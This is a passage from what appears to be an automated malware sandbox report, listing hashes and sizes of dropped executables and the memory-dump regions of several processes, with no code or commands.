                                                                                                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                905KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                dd1313842898ffaf72d79df643637ded

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                93a34cb05fdf76869769af09a22711deea44ed28

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                81b27a565d2eb4701c404e03398a4bca48480e592460121bf8ec62c5f4b061df

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                db8cdcbfca205e64f1838fc28ea98107c854a4f31f617914e45c25d37da731b876afc36f816a78839d7b48b3c2b90f81856c821818f27239a504ab4253fe28f9

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\VC_redistx64.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                2.4MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                eed08799b9f1dbb5d14ad90340354264

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                fbb5daed483bc21f55f4a2a9bedafb7e28832a3c

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                017fbcacfd61daf7c8756d5b39344135210b916a6a89ce813e2f40cddd961fd1

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                1874fd62f98bf16a08cdfd284c828d96c108fef9ff8f6bbc60528b5b752ce24902904c80d45fadda73a1549c81be114d8decd57ba9a61b3feeff12527416bc62

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\conhostsft.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                5.9MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                7ba97adfaefeafc3852e3e487089aab8

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                b16dc49f23259a750187a85f0bee93160dd899da

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                2a7f8053e09311140a87fc1282401457469504f21ac3639c9d736e1906581354

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                e86cf32c47740c19fcea3c1360cfa747b1661452832199bdafe92a6b0552af571e70b2afa8e7674c67a9db2fb990a9652120a06bec40f3dce6b0a6715dd2b6ac

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                2.3MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                280f228a0fd9232c72c66646f5ac8f27

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                f6ed9a02fe24afa92b832efb95d4c140f1f9855a

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                6aace057c548df95831b928aab373130bc09f5636fb7fff52372b4280f2ffe51

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                5e919970667464332083dc40152bcb81f96524c35776d0f945244358885253ab2af1ed9b8db52cb22c60730db95dce34615c7df406c6cd6ae8c5fef3a388af6e

                                                                                                                                                                                                              • memory/400-4-0x000000007FA70000-0x000000007FE41000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3.8MB

                                                                                                                                                                                                              • memory/400-0-0x0000000000400000-0x0000000000DEF000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/400-1-0x000000007FA70000-0x000000007FE41000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3.8MB

                                                                                                                                                                                                              • memory/400-3-0x0000000000400000-0x0000000000DEF000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/1176-355-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/1176-414-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/1176-359-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/1176-361-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/1176-449-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/1176-391-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/1176-314-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/1176-320-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/1176-348-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/1176-352-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/1176-429-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/1176-410-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/1340-284-0x0000027666FB0000-0x0000027666FB6000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                24KB

                                                                                                                                                                                                              • memory/1340-273-0x0000027666D40000-0x0000027666D4A000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                40KB

                                                                                                                                                                                                              • memory/1340-274-0x0000027666F90000-0x0000027666FAC000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                112KB

                                                                                                                                                                                                              • memory/1340-278-0x0000027666F70000-0x0000027666F7A000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                40KB

                                                                                                                                                                                                              • memory/1340-280-0x0000027666FD0000-0x0000027666FEA000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                104KB

                                                                                                                                                                                                              • memory/1340-282-0x0000027666F80000-0x0000027666F88000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                32KB

                                                                                                                                                                                                              • memory/1340-272-0x0000027666D70000-0x0000027666E25000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                724KB

                                                                                                                                                                                                              • memory/1340-271-0x0000027666D50000-0x0000027666D6C000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                112KB

                                                                                                                                                                                                              • memory/1340-287-0x0000027666FC0000-0x0000027666FCA000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                40KB

                                                                                                                                                                                                              • memory/2084-350-0x000000001CE90000-0x000000001D039000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.7MB

                                                                                                                                                                                                              • memory/2084-310-0x000000001C890000-0x000000001C939000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                676KB

                                                                                                                                                                                                              • memory/2084-311-0x000000001CE90000-0x000000001D039000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.7MB

                                                                                                                                                                                                              • memory/2216-179-0x000002BB4CD10000-0x000002BB4CD32000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                136KB

                                                                                                                                                                                                              • memory/2404-313-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-426-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-317-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-162-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-351-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-312-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-356-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-360-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-302-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-321-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-366-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-404-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-413-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-452-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-98-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2404-430-0x0000000000400000-0x0000000000DDE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9.9MB

                                                                                                                                                                                                              • memory/2440-139-0x000000001B790000-0x000000001B7E0000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                320KB

                                                                                                                                                                                                              • memory/2440-141-0x0000000002A50000-0x0000000002A68000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                96KB

                                                                                                                                                                                                              • memory/2440-136-0x0000000000FE0000-0x0000000000FEE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                56KB

                                                                                                                                                                                                              • memory/2440-138-0x0000000002A30000-0x0000000002A4C000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                112KB

                                                                                                                                                                                                              • memory/2440-220-0x000000001C9E0000-0x000000001CA89000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                676KB

                                                                                                                                                                                                              • memory/2440-134-0x00000000006D0000-0x00000000008D4000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                              • memory/2440-151-0x0000000002A80000-0x0000000002A8C000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                48KB

                                                                                                                                                                                                              • memory/2440-147-0x0000000002A20000-0x0000000002A2C000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                48KB

                                                                                                                                                                                                              • memory/2440-149-0x0000000002A70000-0x0000000002A7E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                56KB

                                                                                                                                                                                                              • memory/2440-145-0x0000000002A10000-0x0000000002A1E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                56KB

                                                                                                                                                                                                              • memory/2440-143-0x0000000001010000-0x000000000101E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                56KB

                                                                                                                                                                                                              • memory/4000-304-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                56KB

                                                                                                                                                                                                              • memory/4000-303-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                56KB

                                                                                                                                                                                                              • memory/4000-305-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                56KB

                                                                                                                                                                                                              • memory/4000-306-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                56KB

                                                                                                                                                                                                              • memory/4000-309-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                56KB

                                                                                                                                                                                                              • memory/4000-307-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                56KB

                                                                                                                                                                                                              • memory/4520-43-0x0000000007080000-0x0000000007116000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                600KB

                                                                                                                                                                                                              • memory/4520-40-0x0000000007400000-0x0000000007A7A000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                6.5MB

                                                                                                                                                                                                              • memory/4520-41-0x0000000006DC0000-0x0000000006DDA000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                104KB

                                                                                                                                                                                                              • memory/4520-39-0x0000000074860000-0x0000000075010000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                7.7MB

                                                                                                                                                                                                              • memory/4520-42-0x0000000006E30000-0x0000000006E3A000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                40KB

                                                                                                                                                                                                              • memory/4520-38-0x0000000006C60000-0x0000000006D03000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                652KB

                                                                                                                                                                                                              • memory/4520-36-0x0000000074860000-0x0000000075010000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                7.7MB

                                                                                                                                                                                                              • memory/4520-44-0x0000000006FB0000-0x0000000006FC1000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                68KB

                                                                                                                                                                                                              • memory/4520-37-0x0000000006030000-0x000000000604E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                120KB

                                                                                                                                                                                                              • memory/4520-45-0x0000000006FF0000-0x0000000006FFE000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                56KB

                                                                                                                                                                                                              • memory/4520-26-0x0000000070680000-0x00000000706CC000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                304KB

                                                                                                                                                                                                              • memory/4520-46-0x0000000007000000-0x0000000007014000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                80KB

                                                                                                                                                                                                              • memory/4520-25-0x0000000006070000-0x00000000060A2000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                200KB

                                                                                                                                                                                                              • memory/4520-24-0x0000000005AB0000-0x0000000005AFC000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                304KB

                                                                                                                                                                                                              • memory/4520-23-0x0000000005A70000-0x0000000005A8E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                120KB

                                                                                                                                                                                                              • memory/4520-22-0x00000000055A0000-0x00000000058F4000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3.3MB

                                                                                                                                                                                                              • memory/4520-47-0x0000000007040000-0x000000000705A000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                104KB

                                                                                                                                                                                                              • memory/4520-17-0x0000000005430000-0x0000000005496000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                408KB

                                                                                                                                                                                                              • memory/4520-16-0x00000000053C0000-0x0000000005426000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                408KB

                                                                                                                                                                                                              • memory/4520-48-0x0000000007030000-0x0000000007038000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                32KB

                                                                                                                                                                                                              • memory/4520-10-0x0000000004AC0000-0x0000000004AE2000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                136KB

                                                                                                                                                                                                              • memory/4520-9-0x0000000074860000-0x0000000075010000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                7.7MB

                                                                                                                                                                                                              • memory/4520-49-0x0000000007150000-0x0000000007172000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                136KB

                                                                                                                                                                                                              • memory/4520-7-0x0000000004C70000-0x0000000005298000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                6.2MB

                                                                                                                                                                                                              • memory/4520-50-0x0000000008030000-0x00000000085D4000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                5.6MB

                                                                                                                                                                                                              • memory/4520-8-0x0000000074860000-0x0000000075010000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                7.7MB

                                                                                                                                                                                                              • memory/4520-6-0x00000000024A0000-0x00000000024D6000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                216KB

                                                                                                                                                                                                              • memory/4520-5-0x000000007486E000-0x000000007486F000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4520-97-0x0000000074860000-0x0000000075010000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                7.7MB